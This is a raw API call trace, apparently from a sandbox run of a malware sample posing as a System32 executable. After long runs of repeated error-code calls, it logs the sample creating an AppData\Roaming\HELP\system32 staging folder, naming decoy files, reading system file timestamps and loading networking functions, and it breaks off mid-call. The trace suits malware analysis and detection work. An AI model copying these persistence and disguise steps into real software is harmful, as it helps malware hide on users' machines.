\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÌL«õ\x9cõ\x1a", lpUsedDefaultChar=0x0) returned 256 [0035.871] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.871] SetLastError (dwErrCode=0x0) [0035.871] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.872] SetLastError (dwErrCode=0x0) [0035.872] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.873] SetLastError (dwErrCode=0x0) [0035.873] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.874] SetLastError (dwErrCode=0x0) [0035.874] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.875] SetLastError (dwErrCode=0x0) [0035.875] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.876] SetLastError (dwErrCode=0x0) [0035.876] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.877] GetLastError () returned 0x0 [0035.877] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.878] GetLastError () returned 0x0 [0035.878] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.879] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.879] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.879] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.879] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.879] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.879] SetLastError (dwErrCode=0x0) [0035.879] GetLastError () returned 0x0 [0035.885] SetLastError (dwErrCode=0x0) [0035.885] GetLastError () returned 0x0 [0035.885] SetLastError (dwErrCode=0x0) [0035.885] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.886] SetLastError (dwErrCode=0x0) [0035.886] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.887] SetLastError (dwErrCode=0x0) [0035.887] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.888] SetLastError (dwErrCode=0x0) [0035.888] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.889] SetLastError (dwErrCode=0x0) [0035.889] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.890] SetLastError (dwErrCode=0x0) [0035.890] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.891] GetLastError () returned 0x0 [0035.891] SetLastError (dwErrCode=0x0) [0035.892] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.892] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.892] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.893] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af5e0 | out: lpSystemTimeAsFileTime=0x1af5e0*(dwLowDateTime=0xe31362f0, dwHighDateTime=0x1d3dfba)) [0035.893] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af518, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.893] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af400, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetLastError () returned 0x0 [0035.893] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.893] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.894] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.894] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.894] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.894] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.894] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.894] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.894] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.894] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.894] GetLastError () returned 0xb7 [0035.894] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.894] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.894] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.894] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.894] wsprintfA (in: param_1=0x1af280, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.894] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.894] wsprintfA (in: param_1=0x1af17c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.894] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.894] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.894] CloseHandle (hObject=0x74) returned 1 [0035.894] GetLastError () returned 0x0 [0035.895] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.895] GetLastError () returned 0x0 [0035.895] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.895] GetSystemDirectoryA (in: lpBuffer=0x1af280, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.895] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.895] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.895] CloseHandle (hObject=0x74) returned 1 [0035.895] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.895] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.895] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.896] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.896] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.897] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.897] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.897] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.897] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.897] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.897] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.897] GetProcAddress 